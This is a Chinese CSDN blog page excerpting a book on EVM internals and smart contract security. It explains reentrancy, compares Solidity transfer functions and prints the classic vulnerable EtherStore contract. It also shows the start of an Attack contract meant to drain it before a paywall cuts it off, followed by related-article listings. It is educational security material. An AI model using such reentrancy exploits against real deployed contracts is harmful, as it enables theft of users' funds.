解密智能合约TOP10安全漏洞

最新推荐文章于 2024-06-06 13:36:56 发布
最新推荐文章于 2024-06-06 13:36:56 发布
阅读量1.4w 收藏 28
点赞数 4
分类专栏: BlockChain
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/softgmx/article/details/84339796
版权

以下都是来自我的新作《解密EVM机制及合约安全漏洞》里的内容

电子版PDF下载:https://download.csdn.net/download/softgmx/10800947

 

重入问题

漏洞成立的条件:

  1. 合约调用带有足够的gas
  2. 有转账功能(payable)
  3. 状态变量在重入函数调用之后

底层转账函数

防重入

错误处理

<address>.call.value()()

NO

返回false

<address>.send()

YES

返回false

<address>.transfer()

YES

Revert stateDB到调用前状态

<address>.call.value()的实现:

 

<address>.send()的实现:

 

<address>.transfer()的实现:

 

Transfer能在调用失败时候主动抛出异常的原理:

 

漏洞案例合约:

contract EtherStore {

    uint256  public  withdrawalLimit = 1 ether;

    mapping(address => uint256)  public  lastWithdrawTime;

    mapping(address => uint256)  public  balances;

    function depositFunds()  public  payable {

        balances[msg.sender] += msg.value;

    }

    function withdrawFunds (uint256 _weiToWithdraw)  public {

        require(balances[msg.sender] >= _weiToWithdraw);

        // limit the withdrawal

        require(_weiToWithdraw <= withdrawalLimit);

        // limit the time allowed to withdraw

        require(now >= lastWithdrawTime[msg.sender] + 1 weeks);

        require(msg.sender.call.value(_weiToWithdraw)());

        balances[msg.sender] -= _weiToWithdraw;

        lastWithdrawTime[msg.sender] = now;

    }

 }

攻击合约:

import "EtherStore.sol";

contract Attack {

  EtherStore public etherStore;

  constructor(address _etherStoreAddress) {

      etherStore = EtherStore(_etherStoreAddress);

  }

  function pwnEtherStore()  public  payable {

      require(msg.value >= 1 ether);

      etherStore.depositFunds.value(1 ether)();

最低0.47元/天 解锁文章
天弓(tg)
关注
  • 4
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
智能合约安全——溢出漏洞
FingerNFT的博客
07-28 756
如果一个合约有溢出漏洞的话会导致计算的实际结果和预期的结果产生非常大的差异,这样轻则会影响合约的正常逻辑,重则会导致合约中的资金丢失。所以这个参数可以认为在攻击者的角度是不可用的。1.deposit函数存在两个运算操作,第一个是影响用户存入的余额balances的,这里传入的参数是可控的所以这里会有溢出的风险,另一个是影响用户的锁定时间lockTime的,但是这里的运算逻辑是每次调用deposit存入代币时会给lockTime增加一周,由于这里的参数不可控所以这个运算不会存在溢出风险。...
安全连载——CSDN区块链大本营出品
CSDN 人工智能
10-29 925
史上杀伤力最大的溢出型漏洞到底是什么?看这一篇就够了 | 第1期 4月发生的BEC事件以及SMT事件已经沉淀一段时间了,具体的情况也被多方媒体所报道,相关的漏洞根源问题也有很多大神团队的分析和指正。近日,有安全团队将各种已经发生或可能发生的类似溢出漏洞原理进行整理,再次将全方位的原理分析与大家分享,让大家对溢出型漏洞有全面的认识。 “冰封”合约背后的老牌劲敌——拒绝服务漏洞 | 第2期 目前区块...
两大智能合约签名验证漏洞分析
weixin_34413065的博客
10-17 265
可重入(Reentrancy)或整数溢出漏洞,是大多数开发人员知道或者至少听说过的,关于智能合约当中容易出现的安全问题。另一方面,在考虑智能合约安全性时,你可能不会立即想到针对密码签名实现的攻击方式。它们通常是与网络协议相关联的。例如,签名重放攻击(signature replay attacks),一个恶意用户可窃听包含有效签名的协议序列,并针对目标进行重放攻击,以期获得益处。本文将解释智能合...
智能合约开发中13种最常见的漏洞
最新发布
以择人之心择己,以恕己之心恕人。
06-06 5248
1.重入攻击 2.整数溢出和下溢 3.未授权访问 4.不当的继承顺序 5.短地址攻击 6.断言失败 7.代理模式中的初始化漏洞 8.时间依赖性漏洞 9.Gas限制和DoS攻击 10.权限管理不当 11.外部调用 12.随机数生成 13.存储和计算效率
智能合约漏洞检测——时序信息传播网络TMP
m0_53275879的博客
11-14 1026
智能合约漏洞检测——时序信息传播网络传播模型(TMP model)的介绍
智能合约安全之Solidity函数默认可见性漏洞
StevenX5
05-09 1651
在 Solidity 中,函数有可见性类型,指示函数被允许如何被调用。可见性决定了函数是否可以由用户、其他派生合约、仅在内部或外部调用。函数默认为公共的,即允许用户或合约从外部调用它们。不正确地使用函数可见性可能会导致智能合约中的一些破坏性漏洞。本文通过 Solidity 函数默认可见性漏洞原理的阐述,并结合智能合约实例代码的演示,介绍了一种函数默认可见性漏洞的原理及其解决方法。
javaWeb安全验证漏洞修复总结.doc
11-29
为了检测和修复已解密登录请求漏洞,可以使用 APPSCAN 等安全扫描工具对应用程序进行扫描和检测。这些工具可以检测到潜在的漏洞,并提供修复建议。 应用程序解决方案 为了避免已解密登录请求漏洞,开发者需要采取...
fortify安全基础知识 不同语言软件安全漏洞
05-27
5. **加密与解密**:敏感数据应使用强加密算法进行保护,确保数据在传输和存储过程中的安全性。 6. **安全编码实践**:遵循安全编码规范,避免使用已知不安全的函数或库,减少漏洞产生。 接下来,我们逐一探讨不同...
人工智能-matlab-基于MATLAB的图像加解密及传输仿真
03-12
基于MATLAB的图像加解密及传输仿真 1.基于MATLAB的图像加解密及传输仿真 2.选取“一次一密”加密方式,密钥随机生成,用2ASK的传输方式接收密文 3.通过对图像、密钥和密文的统计,得到数据正确率 4.设置了GUI
解密AIOps:智能运维如何落地?
01-27
随着AI技术在各个应用领域的落地及实践,IT运维也将迎来一个智能化运维的新时代。算法的效率提升了 AIOps的价值,通过持续学习,智能运维将把运维人员从纷繁复杂的告警和噪音中解放出来。在演讲开始,教授通过运维...
为了挖掘智能合约漏洞来拆解以太坊(USENIX 2018)
weixin_43926330的博客
04-05 1029
原文提出一种可以自动检测智能合约漏洞的工具,并且讲述了大致的设计思路(可以拆分不同多种方法使用) 像比特币这样的加密数字货币不仅提供去中心化的货币流通,还给交易提供程序化方法。以太坊,紧接着比特币第二大的加密数字货币,它是首先提出用图灵完备语言去列举交易过程,因此能被称为智能合约。这就为攻击者提供很好的目标,因为安全漏洞经常跟随着金融目标。在这篇论文里,我们考虑智能合约漏洞自动识别和漏洞生成这样的...
基于GNN的智能合约漏洞检测(tmp)方法部分翻译(1)
小楼一夜听春雨
11-14 2911
背景 实在是没办法,不翻译印象不深。。。 我们的方法 为了解决现有工具在智能合约检测方面的不足,我们提出了一种超出传统基于规则的框架的方法。特别地,我们根据程序中的数据流和控制流关系将智能合约源代码提取特征为一个合约图。图上的节点表示关键的函数调用或关键变量,图上的边捕捉它们的时间执行路径。由于大多数GNN模型都是在信息传播过程中显现出与生俱来的“平”,我们设计了一个消除阶段来使得图规范化。 ...
智能合约 -- 常规漏洞分析 + 实例
本郡主是喵
08-11 4112
在上面的代码片段中我们可以看到,distribute() 函数中会去遍历投资者数 组,但是合约的循环遍历数组是可以被外部的人进行人为扩充,如果有攻 击者要攻击这个合约,那么他可以创建多个账户加入投资者的数组,让 investors 的数据变得很大,大到让循环遍历数组所需的 gas 数量超过区块 gas 数量的上限,此时 distribute() 函数将无法正常操作,这样就会造成该 合约的拒绝服务攻击。第一去取钱,状态变量修改为true,从而将函数锁住,必须等这次函数执行完毕,才能重新对函数进行调用。
智能合约重入漏洞
weixin_40222848的博客
05-21 582
可重入漏洞智能合约中最危险的漏洞之一,它可能导致合约余额(以太)被攻击者窃取。如果一个合约中的支付函数调用(即call.value()、deposit.value()、transfer()等)被用来调用其他合约,而被调用方也调用调用方,从而再次进入调用方,则会发生这种情况。它将最终提取调用方合约账户的全部金额,而区块中的记录只是第一次提取。例如,在图中,攻击者调用合约Attack中的attack函数(第23行),它将通过第24行执行合约Reentrance中的withdraw函数。当合约Reentrr..
智能合约漏洞——重入漏洞
S123456215的博客
05-27 1229
​前提:一个消息调用的目标,可以再次进行智能合约创建或者信息调用。 重入:消息调用的目标智能合约函数中又调用了发起消息调用的智能合约的函数。 假设:智能合约A有函数F1,攻击合约B有函数F2。F1功能是向消息发送方转账,或者调用消息发送方的特定函数,B就有可能利用重入进行攻击。 受害者合约: contract EtherStore{ uint256 public withdrawaLimit = 1 ether; mapping(address => uint256) publi
以太坊智能合约 Hexagon 存在溢出漏洞
Fly_鹏程万里
06-19 493
最近通过对智能合约的审计,发现了一些智能合约相关的安全问题。其中我们发现智能合约Hexagon存在溢出攻击,可产生无数的token,导致整个代币都没有意义。 Token地址:https://etherscan.io/address/0xB5335e24d0aB29C190AB8C2B459238Da1153cEBA该代币可能要上交易所,我们已第一时间向官方通知该问题。目前发现受影响合约地址:成因分...
存在漏洞智能合约(1)
weixin_43354545的博客
10-08 432
合约地址 Contract Address 漏洞类型 Type 附加说明 Description 0x7d517345f11C69a93a28Be80fceE0d6234273651 整数溢出 0xb24d44e73f34f62f0f356aa39a53fe830775a03a 整数溢出 0xc5d105e63711398af9bbff092d4b6769c82f793...
智能合约漏洞学习笔记(1):重入攻击
qq_42943698的博客
03-04 1130
前置知识 回退函数(fallback function):每一个合约有且仅有一个没有名字的函数,无参数,无返回值 function() public payable{} 回退函数在以下几种情况中被执行: 调用合约时没有匹配到任何一个函数 没有传数据 智能合约收到以太币 (为了接受以太币,fallback函数必须标记为payable) 硬分叉:添加无法向下兼容的新规则,使得以太坊网络存在两条链:运行新规则的新链和运行旧规则的旧链 第一次硬分叉:调整了未来挖矿的难度,确保未来的用户会有转换至权益证
揭示EVM机制与合约安全:深入剖析Solidity漏洞
解密EVM内部机制及合约安全漏洞》是一本深入剖析以太坊虚拟机(EVM)及其智能合约安全问题的专业书籍。作者ElvisGong在2018年11月22日发布的内容涵盖了EVM的底层实现、Solidity高级语言的使用、以及智能合约中最...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值